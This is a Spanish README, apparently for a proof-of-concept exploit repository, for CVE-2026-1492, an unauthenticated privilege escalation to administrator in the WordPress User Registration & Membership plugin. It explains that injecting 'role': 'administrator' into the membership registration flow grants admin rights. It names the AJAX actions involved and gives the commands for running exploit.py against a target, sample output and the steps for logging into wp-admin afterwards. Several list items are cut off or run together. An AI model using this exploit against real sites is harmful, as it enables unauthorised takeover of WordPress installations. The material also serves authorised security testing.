
Prueba de concepto de exploit para CVE-2026-1492 en el plugin User Registration de WordPress, que permite la escalada de privilegios no autenticada a administrador mediante un registro de membresía manipulado.
Este repositorio contiene un exploit de prueba de concepto para CVE-2026-1492, una vulnerabilidad crítica que afecta al plugin de WordPress User Registration & Membership.
La vulnerabilidad permite a atacantes no autenticados crear cuentas de administrador abusando del proceso de registro de membresía.
👉 Un análisis técnico completo de esta vulnerabilidad está disponible aquí:
Análisis técnico
Explica paso a paso cómo el backend procesa los datos controlados por el atacante y por qué es posible la escalada de privilegios.
El plugin confía de forma inadecuada en la entrada controlada por el usuario durante el proceso de registro de membresía.
Específicamente:
role proporcionado por el usuarioEsto permite a los atacantes establecer:
"role": "administrator"
y obtener acceso administrativo completo.
La explotación exitosa permite:
La vulnerabilidad se desencadena a través de un proceso AJAX de varios pasos:
user_registration_user_form_submituser_registration_membership_register_memberadministrator)python3 exploit.py -t http://objetivo -ru 'http://objetivo/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] Extrayendo tokens...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] Enviando solicitud de registro...
[+] Usuario creado
[*] Enviando solicitud de membresía...
[+] Escalada de privilegios exitosa
Inicie sesión con las credenciales generadas:
http://objetivo/wp-login.php
Luego acceda al panel de administración:
http://objetivo/wp-admin/
Nota: La ruta de administración puede estar personalizada.
Este exploit se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.
No lo utilice contra sistemas sin permiso.